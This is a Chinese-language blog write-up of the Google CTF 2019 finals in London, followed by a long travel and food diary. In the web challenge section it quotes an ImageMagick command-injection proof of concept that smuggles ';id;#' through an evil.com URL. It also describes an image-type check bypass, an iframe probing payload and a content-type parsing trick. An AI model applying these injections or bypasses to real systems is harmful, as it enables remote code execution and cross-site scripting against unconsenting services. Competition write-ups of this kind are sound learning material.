Google CTF 2019 Final

前言

這場是 Google 舉辦的 CTF 決賽，地點在英國倫敦的 Google 大樓內

比賽時間兩天，都是早上9點開始，第一天到晚上8點，第二天到晚上6點半

但其實回飯店後還是能繼續解題，題目都不會關，只有部分題目沒辦法線上解

(p.s. 內文圖多慎入)

CTF

現場跟初賽很大的不同點是，現場賽會有一些特殊的硬體類題目

或是一些必須真人到場才能解的題目，例如開鎖題

而題目總共有七種分類：crypto, hardware, misc, sandbox, pwn, reversing, web

前面講的開鎖題 (Picky blinders) 就被歸類在 Misc 中

這題會讓各隊選偏好的時段，然後時間到就會被抓出去外面開鎖

然後這題有三個鎖，第一個鎖應該算練習用的，是那種透明教學用的鎖

解鎖的方式就是把撞針頂到對的位置，然後用另一根工具(不知道叫啥名字)去轉它就能開了

第二個鎖是不透明的鎖，就要自己慢慢一個一個踹到對的點

@sasdf 踹了一波就秒開掉這個鎖了，真不愧是密碼學大佬

第三個鎖是一個類似保險箱的東西，要用一隻能伸縮，且外型像筆的工具去開他的鎖

FLAG則是放在這個保險箱中，打開鎖就能拿到flag

我簡單踹了一波，發現其實還蠻容易抓到感覺的

只要戳到對的點，轉動的手感會不太一樣，慢慢微調就能打開了XD

蠻有趣的題目，對沒開過鎖的我來說是個不錯的體驗

很像那種會在Security Conference上看到的開鎖教學攤位XD

硬體題有一題類似密室逃脫，是一題拆炸彈題

可以選一位隊員去炸彈房，其他隊員在另一間房，彼此可以用無線電溝通，想辦法拆炸彈

在進去之前，我們還不知道是要拆炸彈，不過主辦方有給個小提示:

所以我們一開始只知道是跟七段顯示器有關的電路題XD

炸彈會倒數計時，時間到就會爆炸

然後上面有十個撥動開關，和兩條線，以及會影響計時快慢的電容

所以解法其實蠻直觀的，就是把開關撥成正確的密碼，最後剪正確的線就能停止炸彈爆炸

第一天和第二天分別能進去一次，所以必須想辦法在兩天內拆掉炸彈，不然就拿不到flag了

(但主辦方中間有出包，炸彈一開就爆炸，所以我們總共進了三次)

炸彈房裡聽說很黑，然後會有一個穿軍裝的人站在旁邊盯著你，讓你感覺壓力很大XD

然後炸彈房不能帶東西進去，你必須想辦法透過無線電告訴另一間房的隊友，或是超越常人的記憶力把炸彈電路記下來

基本策略應該就是第一天盡可能把電路整體配置 Out of band 帶出來，第二天再速解電路然後剪線

如果進去炸彈房的那個人連電路都看不懂，那基本上就不用玩了XD

不過最大的難點是，很難透過無線電對話把各個邏輯閘、IC元件線路等資訊帶出來

所以主辦方還貼心(?)附了一張NATO phonetic alphabet:

但這題最後只有 !SpamAndHex 解掉，根本拆彈專家XD

其實我們有想到一種能讓電路短路，然後停止時間的方法，但被主辦方禁止使用XD

Misc 另外有一題 Stuffed，內容是一個網頁

會用 Brotli 編碼去壓縮一堆垃圾，這堆垃圾中間夾了 flag

所以直接訪問這個網頁，瀏覽器就會把內容解壓縮並顯示出來

但這題難點在於，這坨垃圾非常大，解壓縮非常吃時間和記憶體，有點類似gzip bomb

而 google 很好心的提供我們免費的gcp帳號，可以任意的開機器

所以我們就開了 160 Core + 3.7 TB Memory 的土豪級機器來炸這題:

(它的 Memory 比我電腦硬碟還大…)

結果雖然克服了記憶體問題，但時間上還是太慢，一個一個慢慢解，解不完

由於算法的關係，這題也沒辦法像之前某場比賽一樣直接把重複的 Pattern 拔掉

最後我在睡夢中時，隊友用這個: https://github.com/pothos/brotlipython 工具撈出 flag

該網頁格式長這樣:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

<html>
<head>
<title>Flag page</title>
</head>

<body>

Flag:

<!-- aaaaa .... -->

CTF{DontEatThePl4yerEatTheBrotli}

<!-- aaaaa .... -->

</body>
</html>

其他領域的題目，有的題類似 Pwn2Own，要把 exploit 塞進隨身碟，然後主辦方會在台上 demo 給大家看，打成功就送你flag

不過這邊主辦有點小雷，他賽中沒有限制嘗試次數和間隔時間，但我們在解的時候，臨時說一個小時只能踹一次

然後 Pwn 有一題 Gomium Browser

我們本地成功彈計算機，但上台 exploit 兩次都失敗

剛好就是比賽最後兩個小時，所以就很可惜的沒解掉

(聽說主辦方在我們失敗之後，關掉螢幕再跑第二次就成功，似乎我們的 Exploit 沒有到非常穩定，所以運氣很差的剛好都失敗)

Web 的部分，這場共三題 Web，難度應該算是我打過的決賽最高的

第一天前半場只出了一題 gPhotos2

這題跟初賽的 gPhotos 功能幾乎一樣，你可以傳一張 png, jpg, jpeg 圖片 (會用 imghdr.what 去判)，之後會去 resize 轉成縮圖

(這裡圖片判斷很好繞，只要從第七個字元開始塞JFIF就能繞掉了)

只是初賽是用 PHP 套 ImageMagick，這題則是 Python django 套 Wand image library

初賽那題的解法可以參考 Bushwhackers 的 Writeup: https://blog.bushwhackers.ru/googlectf-2019-gphotos-writeup/

基本上就是利用 MSL 搭配各種小技巧去 RCE

但 Python 這題就很難了，因為你沒辦法像php去寫 Webshell

所以一開始我們的方向就變成是找 polyglot 的 payload

去想辦法寫檔蓋掉 import 的 python (搭配 DoS 的洞讓他 Reload library)

到最後發現，的確成功能用 MSL 去任意寫檔

也成功 Polyglot 造出合法 Python

但寫了後不管怎麼 DoS 它，都沒有成功載入我們的 Python payload

賽後問了出題人才知道，原來根本沒有資料夾寫入權限…

其實也不太意外，方向偏太多了

第二天比賽到一半時，這題主辦方有給了一個 Hint: docker image is based on standard debian

看起來是跟作業系統環境有點關係的利用方式

到比賽結束，共有兩隊解出來這題，分別是 RedGKFRocket 和 Pasten

公布解答才知道，原來這題根本是 0day 題

預期解是類似 ImageTragick 要打 .show extension 的 Command Injection

可以在本地踹: $ convert "http://evil.com/some.png?z=';id;#'&x=123" out.show

不過有隊找到非預期解，是用 ghostscript 去 RCE 的樣子，但也是 0day … ╮(╯_╰)╭

第二題 Web 是 Saber.ninja

這題還蠻有趣的，是一個音樂遊戲譜面上傳、預覽的網站

一開始會給你一個 Example.bsl，其實就是個 zip 包

裡面包了 Info.dat, Expert.dat,song.ogg 等檔案，紀錄譜面出現時間、歌曲名字、作者名字等資訊

然後網站可以讓你上傳你自己的 bsl，他會檢查裡面的格式是否符合要求 (這裡要自己黑箱踹)

若上傳都沒問題，則可以預覽譜面和顯示歌曲名字、作者名字等資訊，還有連結可以直接下載這個 bundle 包跟 beatmap

另外網站還有一個聊天室可以和你的對手 (admin之類的) 對話

他要求你只能塞 https://saber-ninja.web.ctfcompetition.com/preview/* 的網址，所以很明顯是個 XSS 題

而我們也很快找到 Info.dat 裡的作者、歌曲等資訊都能塞 HTML Tag

但這題有討人厭的 CSP: content-security-policy: default-src 'self'; frame-src *;

所以基本上這題八成要用到 iframe 來 XSS

OK，我們想說先看一下對面的瀏覽器版本

所以就塞 <iframe src="\\kaibro.tw"> 之類的 Payload 來讓對面 Bot 送 Request

但傳了老半天都沒半個 Request 回來，一度懷疑 Bot 已經爛掉了

一問出題人，才知道原來送了連結過去，還要先去外面的遊戲房玩過你剛剛送的譜面

過關之後，Bot 才會讀你的連結… WTF

其實玩遊戲這件事蠻有梗的，但是題目完全沒提到有遊戲室這個規則，整個很黑人問號

如果我們沒問出題人，全場根本不會有人知道要先玩遊戲才能觸發 BOT 訪問= =

後面還出了一些小問題

例如 BOT 不知為啥只能透過常用 Port 對外連線

應該是 Google 那邊出題環境沒弄好，有點小雷

而遊戲部份，是一個 VR 光劍的音樂節奏遊戲 (BeatSaber)

要戴上VR眼鏡，手拿光劍在那邊砍紅色跟藍色的 Notes，中間還會有牆壁之類的障礙物，所以人要跟著左右閃躲XD

由於我們已經能夠控制譜面資訊，但是它規定每首歌都至少要有100個 notes

所以我就把譜面最開頭塞了 100 個相同的 notes 疊再一起，只要揮一次劍就能 Full combo XDDD

玩完遊戲，主辦方就會 enable 題目 bot 對我們送過去連結訪問的權限

從回來的 Request 可以看到，對方環境是 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3882.0 Safari/537.36

另外我也不小心從主辦方的電腦瞄到幾個關鍵字: UXSS Bot, NaCl

所以猜測這題可能是某種神奇的 Chrome 0/1 Day UXSS

搜尋了一波沒找到類似的洞，就果斷跳題了XD

中間我們有嘗試透過 Polyglot zip+js 來去做 XSS，但在成功造出 Payload 且本地測試成功時

發現對面環境有設 Content-type nosniff，所以遠端失敗XD

最後這題到結束，0 隊解，不意外XD

解法在這: https://shhnjk.blogspot.com/2019/07/intro-to-chromes-gold-features.html

Web 第三題是 Genie’s wishlist，這題是一個可以跟精靈許三個願望的網頁

題目給了部分 Source code，是一個類似 Proxy 的架構，然後是 Flask 寫的

基本上是從 https://github.com/dtkav/flask-batch/blob/master/flask_batch/flask_batch.py 這裡改來的

你可以輸入三個字串送過去，他會包成 multipart/mixed 的格式送出去給後端，但後端其實就是同一台 Server

然後網頁還有一個功能，可以塞一個 url 給它，它會用 Headless 訪問這個 URL:

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/79.0.3945.0 Safari/537.36

所以猜測這題有可能也是 XSS 或前端類的題目

認真看 Code 會發現不少小問題，但都很難串在一起

例如:

1
2
3
4

>>> ct = "multipart/mixed;boundary=batch_abcdefg;boundary=batch_123456"
>>> m = _rex.fullmatch(ct)
>>> m.groups()
(None, None, 'batch_123456')

塞兩個 Boundary，它會取第二個

賽中一直在踹能不能想辦法造成 Proxy 跟後端解析不一致，然後達到類似 Desync 之類的污染效果，但最後失敗惹QQ

另外還有像是:

1

/batch?ct=multipart/mixed;aaa=bbb;boundary=batch_w3ier5whgj

這樣塞，會導致最後後端回來的 Response Content-type Header 變成部分可控的，aaa=bbb會原封不動的回來

所以可以類似這樣玩: batch?ct=multipart/mixed;charset=utf-16;boundary=batch_w3ier5whgj，會把charset搞掉

不過還是沒辦法把 Content-type 弄成 text/html之類的

而 Client-ID 的部分是會回顯的，所以只要我們能想辦法把 Content-type 蓋掉就能 XSS

Source Code 中，用來 Parse Content-type 的正規表達式寫得很刻意，一眼就知道有洞，但還是找不出來問題:

content_type_regexes = 'multipart/[a-z]+(?:-[a-z]+)*(?:[;,\\s]\\s*[a-z]+(?:-[a-z]+)*=(?:"(?:[^"]|\\")+"|\'(?:[^\']|\\\')+\'|[^"\':;,\\s]+))*[;,\\s]*boundary=(?:"([^"]+)"|\'([^\']+)\'|([^"\':;,\\s]+))(?:[;,\\s]\\s*[a-z]+(?:-[a-z]+)*=(?:"(?:[^"]|\\")+"|\'(?:[^\']|\\\')+\'|[^"\':;,\\s]+))*[;,]?'

賽中我手動看著 RFC 踹了幾個特殊字元，試著玩弄回顯的 Content-type，但都沒成功蓋掉 Content-type

比賽結束後，出題人才說這題可以用 Content-type: foo,bar 會取成 bar 的特性來蓋

結果原來我們離正解只差了一點，繼續多踹，運氣好蓋掉Content-type就贏了，算是這場最遺憾的一題 Web XD

p.s. 這題最後只有 !SpamAndHex 解掉

整體來說，這場題目質量挺高的

也蠻多有趣的題目

食物飲料也各種爽拿爽吃

但還是有一些小地方待改進

例如很多題目環境都講得不清不楚，還有前面提的賽中臨時公告特殊規則等

希望未來可以改善這些小缺點!

行程

這次比賽日期主要在 11/2, 11/3 兩天

不過我們 10/30 就到倫敦了，提早跑一些行程

Google 還因此多送我們一晚住宿，聽說一晚價錢要8000台幣，真。佛心公司!

10/31, 11/1, 11/4 這幾天主要就是跑跑倫敦，晃晃一些經典景點之類的地方，然後回去的飛機是 11/4 晚上

10/31 報名一日旅遊團，跑了溫莎古堡、巨石陣、羅馬浴場等地方

11/1 則是晃了一些倫敦市區經典景點，包含倫敦塔橋、西敏寺、白金漢宮、倫敦眼等

11/4 則是跑了肯頓市集和大英博物館等地方之後，就搭飛機回台灣

交通

交通方面，倫敦基本上觀光客會去的地方都有地鐵能到

我們大概只有機場到倫敦這一段是搭火車，其他都是搭地鐵

所以只要買張牡蠣卡(Oyster card，類似悠遊卡)，就能通行無阻了

牡蠣卡有分兩種版本：一般版和遊客版

買的時候都是 35 英鎊，相當於卡片 5 英鎊，裡面帶有 30 英鎊餘額

一般版可以把卡片退還，會把押金退還之類的，遊客版則是相當於花5英鎊買那張卡做紀念，不用退還

但其實這個有 BUG，他跟台灣悠遊卡一樣可以刷到金額變負的

我們在最後一天搭車回機場時，最後餘額變-8，所以其實還倒賺3英鎊

住宿

這次我們的住宿全程都由 Google 包辦，住了一家叫 Pullman 的飯店

地點位在國王十字車站走路3~5分鐘遠的地方，算是還蠻方便的

重點是每天早上在一樓都有很高級的早餐，裡面的食物屌打一堆英國昂貴餐廳的食物

(飯店看出去的夜景)

(白天也蠻美的)

硬要說這間的缺點的話，大概就是房卡很容易出問題的感覺，例如：某天回去莫名被消磁鎖在門外

景點

巨石陣 + 溫莎古堡 + 羅馬浴場

這趟行程，我們是透過klook訂一日導覽票卷

所以一早就去集合點坐遊覽車，然後他會帶我們跑這三個點+講解

有趣的是車上的導遊會同時講日文和英文，好像是車上有不少日本遊客的關係吧

第一站是到溫莎古堡，會在一個火車站旁邊下車，然後走上去就會看到一整區很大的城堡

不過也因為這種一日行程通常都很緊湊，很多城堡內的點都沒辦法走完，有點可惜

最令人印象深刻的地方是裡面有個教堂，擺放各種騎士的劍和各種旗幟之類的東西，很壯觀，但可惜裡頭不開放拍照

第二站就是整趟旅程的重頭戲：巨石陣

關於巨石陣的意義說法很多種，有人覺得是用來悼念亡靈用的，有人覺得跟觀測天文有關

由於巨石陣成因過於神秘，所以總覺得來英國不來看一下巨石陣好像有點可惜

但實際現場看完之後，又會覺得好像不該浪費時間大老遠跑來看幾塊大石頭XD

光是從倫敦搭車過去，單趟就要花2~3小時，蠻累的

真的是「不看會後悔，看了也會後悔」

而且還只能遠遠隔著圍欄看著這些大石頭，沒辦法走近觀賞

第三站是位於巴斯的羅馬浴場

據說建於2000年前古羅馬帝國時期，跟電影裡演的一樣，古羅馬貴族都很愛泡溫泉澡XD

而巴斯(Bath)這裡是英國唯一的天然溫泉區，所以古羅馬人就在這裡蓋了一座浴場，他們相信溫泉有治病的療效

(二樓雕像是大家歷史課讀過的那幾位著名古羅馬皇帝)

聽說這種一層一層的是桑拿房，似乎可以幫忙傳導溫泉熱，愈多磚頭愈熱

溫泉旁邊還會請人穿著古羅馬裝，扮演當時來泡澡的人們:

另外浴場裡還有地方提供遊客品嚐「溫泉水」

喝完之後，我立馬覺得自己為啥會蠢到想把溫泉水拿來喝，爆幹噁心又難喝

羅馬浴場旁邊就是著名的巴斯修道院，外觀哥德式風格，讓人經過很難不多看幾眼

旁邊會有一些街頭藝人在表演：

倫敦塔 & 倫敦塔橋

這兩個點也算是來倫敦必去的景點

倫敦塔其實不是一座塔，嚴格來說比較像城堡

然後倫敦塔橋就是倫敦塔旁邊橫跨泰晤士河的一座橋，所以這兩個點可以同時去

旁邊不遠處還有座「倫敦橋 (London Bridge)」，兩個是不同的橋，名字很容易混淆XD

不過由於倫敦塔門票似乎有點貴，所以我們沒有進去，只有遠遠觀賞它

旁邊還看到類似投石機的東西:

害我腦中一直響起世紀帝國等登等登的聲音

倫敦塔橋就在倫敦塔隔壁，一樣可以進去裡面參觀

好像上面有步道可以走，但一樣門票太貴，我們沒上去

白金漢宮 & 西敏寺 & 倫敦眼

這三個點都在同一區，都是走路可以到的距離

其實大笨鐘也在這區，一出地鐵就會看到，不過因為還在維修，所以旁邊滿滿的都是鷹架QQ

而白金漢宮其實蠻無聊的，大家來這裡應該主要都是看麥克風頭的禁衛軍交接

不過我們在溫莎城堡已經看過一次交接了XD

另外白金漢宮旁邊的 Green Park 蠻美的，橘紅色的落葉很有秋天的歐洲味

相對於白金漢宮，西敏寺的哥德式風格倒是比較合我胃口，但一樣人太多，而且門票太貴，所以就沒進去了

至於倫敦眼，其實就是一個普通的(?)摩天輪

拍照時，天氣剛好要下雨不下雨的，所以拍出來陰陰的，沒啥美感

(這裡的海鷗會飛來飛去幹走路人手上的食物)

貝克街

雖然我不是福爾摩斯粉，但還是來朝聖一下著名的貝克街

一出 Backer Street 地鐵站，旁邊就有一尊福爾摩斯雕像:

圖中這條樸實無華的街道就是大名鼎鼎的貝克街:

圖中左邊是福爾摩斯住的地方，右邊是博物館，其實就是紀念品店

不過一樣，進去要排超長，又要收門票費，所以就沒進去了

英國真的是到哪都要收費，連上廁所也要收錢

不過紀念品店倒是蠻多特別的玩具，手癢買了一個音樂盒、火柴盒和打火機:

九又四分之三月台

著名的九又四分之三月台場景，就在我們住的飯店隔壁的國王十字車站裡

排隊拍照的人長的很誇張，旁邊工作人員也很專業，會指導你該怎麼擺姿勢

但一樣，我們只有在旁邊看而已，沒去排XD

肯頓市集

就是一個很有歐洲味的市集

然後有很多文青類的商店，例如有賣黑膠、賣古董的店

我也手癢買了一張甲殼蟲樂隊的黑膠唱片裝逼一下

但其實這個市集蠻大的，我們最後也沒逛完，吃個東西就離開去大英博物館惹

大英博物館

最後一天的整個下午，基本上都只排大英博物館

因為真的太大了，一天實在逛不完

順便來見識一下大英帝國時期，英國人到底從各國幹回來多少贓物

一進博物館，就會看到很美的玻璃天花板

然後往左走，就是最有看頭的埃及展區

一進門就會看到鎮館之寶，傳說中的羅塞塔石碑

記載著埃及象形文、埃及草書和古希臘文的羅塞塔石碑

對於解讀古埃及歷史和古埃及象形文都是重要的里程碑

而隔壁就是著名法老拉姆西斯二世的雕像

據說肩膀的孔洞，是拿破崙時期的法國人為了盜走所穿的孔

展區內還有各種壁畫、石棺、雕像

還有古埃及人視為聖甲蟲的糞金龜:

其他展區也有一些特別的東西

像下面這個就超狂，英國人跑去把別人家的門幹下來帶回英國

還有亞述展區很詭異的人面獸身拉瑪蘇

也是大英博物館必看的摩艾石像:

後面是另一個必看重頭戲，埃及木乃伊

說真的現場看還蠻驚悚的XD

他們都會在包裹的繃帶和布上面畫上臉

其實還有解開繃帶的樣子，不過由於微噁爛，就不貼惹XD

其他還有像是帕德嫩神殿的雕刻，也是很壯觀

從圖片可能看不出來大小，實際上這個超級大，英國人到底怎麼幹回來的XD

Google

Google London 某種程度應該也算是個景點XD

地點就在國王十字車站旁邊而已，超級方便，離飯店不到十分鐘路程

在賽前一天，主辦方有辦一個 Office Tour 和晚宴，結束後還有 King’s club 行程

但由於我們行程緊湊，所以 Office Tour 就沒去，只有參加晚宴跟 King’s club

一走進 Google London 大樓，最吸引目光的就是這面有各種經典人物、角色的牆:

白天時往上看也蠻壯觀的:

然後這場沒有 Badge，但是兩天都會發這種識別證給你配戴:

還發了一個整場都沒用到的 coin，也許是給我們當紀念品(?

每人還有一件印著自己 ID 的T-shirt，不過材質不優，尤其是領子的地方，很不舒服

(Google乾爹錢這麼多怎不挑個材質好一點的衣服QQ)

而且樣式有點醜，工作人員的款式比較好看XD

每隊桌子旁邊都有一個會發光的擋板:

還有電競椅(?)

然後這是冠軍獎杯，雖然無緣拿到，但至少有摸過XD

Web 的 Saber.ninja 那題，要讓 BOT 訪問你的連結，就是要來這邊跟他一樣玩這個VR遊戲:

(圖中那個是這題出題人，他會講中英日三種語言，超強)

這是First Blood 和 New Leader(第一名換人時) 的特效:

Pwn 的 Gomium Browser 那題，Exploit 會被放到大螢幕上打一遍給大家看，噴計算機就是成功:

頒獎典禮:

Dragon Sector 帶了幾瓶波蘭烈酒來給大家喝:

賽後Party跟A*O*E大佬交流，能講中文的感覺真好:

(不過這時我已經被 Dragon Sector 的烈酒灌到茫惹XD)

食物

The Easton

這間是我們在英國吃的第一餐

英國好像比較少正式的餐廳(以我們住的那一區來說)

大部分都是這種酒吧類的，然後裡面也會賣一些吃的

我吃的是類似紅酒牛肉派的東西:

吃完就開始對英國食物不抱任何期待惹，實在不優

不過這家的酒都不錯喝

連不太喝酒的@bookgin都說好喝惹

我點了一杯Pale ale的啤酒也是比想像中順口

Shaka Zulu

這間是賽前一天 Google 主辦方帶我們去吃的晚餐

地點在肯頓市集裡的一間非洲餐廳

從走進去的一步開始，就能感受到濃濃的非洲味

除了是餐廳外，他裡面還是個酒吧，所以外面會有門禁管制

由於我們算是比較新的隊伍，其他隊伍都是老牌強隊

所以除了 TokyoWesterns 之外，我們基本上都沒有認識的

一進餐廳就有點像邊緣人，只能坐在角落的一桌XD

不過也剛好因此跟這場的 Web 出題人坐一桌

餐點方面，這個雞翅和鮭魚比主菜好吃上百倍:

然後這款啤酒聽說是非洲有名的一款啤酒

味道跟我印象中 Larger 啤酒的味道有點落差，不過是好喝的XD

它的紅白酒、粉紅酒也都不錯喝:

然後這個是我點的主菜，斑馬肉!

不過吃起來口感像牛肉，但比較難咬，沒啥特別的味道，非常不優

下面這個是@yuawn點的牛排，幾近全熟，也是不優:

不定時還有火舞表演，還算能看啦:

最ㄎㄅ的是，晚餐結束本來有個King’s club行程

不過大家好像都搞不太清楚到底是怎樣，甚至工作人員也不知道

所以後來就一群人莫名被帶回飯店，只留下我們和那群出題人

後來才知道 King’s club 就是同一家餐廳裡面的酒吧…WTF

再加上隊上其他人都不太喝酒，所以最後坐了一會就跟出題人搭地鐵回飯店了

Stoke House

這間是我們從巨石陣回來吃的晚餐

應該是倫敦之旅花費最高的一餐

我的主餐是這個烤豬排

肉質意外的嫩，而且烤得很香，但吃到後面會有點微膩

而我點的這杯調酒叫Lolipop，裡面有加Midori，所以看起來才綠綠的

然後下面這個是 @sasdf 和 @yuawn 點的大牛排(這盤要數千台幣XD):

Borough Market

這個市場還蠻熱鬧的，攤販多，人也很多

我們來這裡主要是為了吃英國必吃的炸魚薯條:

但吃起來跟在 Vegas 吃到的沒啥太大差別，一樣吃到後面會很膩

不過很幸運的在旁邊的小攤販買到一杯很好喝的熱紅酒:

Google Food

我們比賽兩天的食物都是 Google 包辦的

不得不說，雖然沒有到特別好吃，但已經比我們在外面餐廳吃的東西好吃很多惹

下面這個很像肉燥的東西，配飯超好吃，我嗑掉好幾碗飯:

然後有神奇的檸檬薄荷水，個人不太喜歡:

Red bull, 可樂, 雪碧啥的也都是免費拿到爽:

晚餐吃pizza:

還有滿滿的薯條和洋蔥圈:

墨西哥捲餅:

After Party 的酒也是誠意滿滿

還有 Dragon Sector 帶的酒:

肯頓市集

最後一天，在去大英博物館之前，我們先到肯頓市集亂晃，順便吃午餐

由於英國幾乎沒有手搖杯店，所以走了很久才找到一家賣喝的

點了一杯中規中矩的 Chocolate Milk Shake:

@sasdf 則是點了一杯顏色很神奇的飲料:

然後附近吃的幾乎都是很美式的漢堡薯條或是炸物

還有 wow~big size 的大熱狗

機場

最後要上飛機前的晚餐

意外吃到爆幹好吃的食物，幾乎可以排在我這趟旅行的前三好吃食物了

就是這個 Thai duck stir fry，超爆幹好吃的泰式炒麵

醬汁鹹甜又帶點微辣，讓人不禁一口接著一口

還意外找到我一直在找的 London Pride 啤酒:

這款是英國經典的道地啤酒，不知為啥跑了很多超市都找不到

最後居然給我在機場找到了

喝起來口感，苦味偏低，然後帶有點微微焦糖味，和很濃的麥香

不愧是道地經典啤酒，真的不錯喝

其他

巨石陣遊客中心買的奶油派:

老實說，很難吃，真的不習慣吃英國的派

結尾

總結來說，這場給我的感覺比之前打過的幾場現場賽都還要好

雖然還是有些很黑人問號的地方，但都沒有到很嚴重影響比賽進行

如果主辦方能把規則講清楚一點就完美了

也從比賽解題的撞牆過程中學到很多東西，時間不長，收穫很大!

然後食物飲料免費拿真的很爽，多送一天住宿也很爽，感謝 Google 乾爹

另外也遇到很多平常只會在 Twitter 上看到的超級大佬

還記得跟某個出題人要 Twitter 時，才發現我已經 Follow 過他了，原來就是某某某大神XD

人不可貌相這句話，在這次英國行也徹底體會到了

你絕對想不到隔壁長得像毒梟的傢伙，居然是出題大佬XD

不過這幾天下來，深深感受到英國食物真的幾乎都很難吃QQ

還好有@bookgin帶的泡麵，幫忙解決一餐宵夜

這碗泡麵大概也能排進這趟英國行的美食排行榜前五吧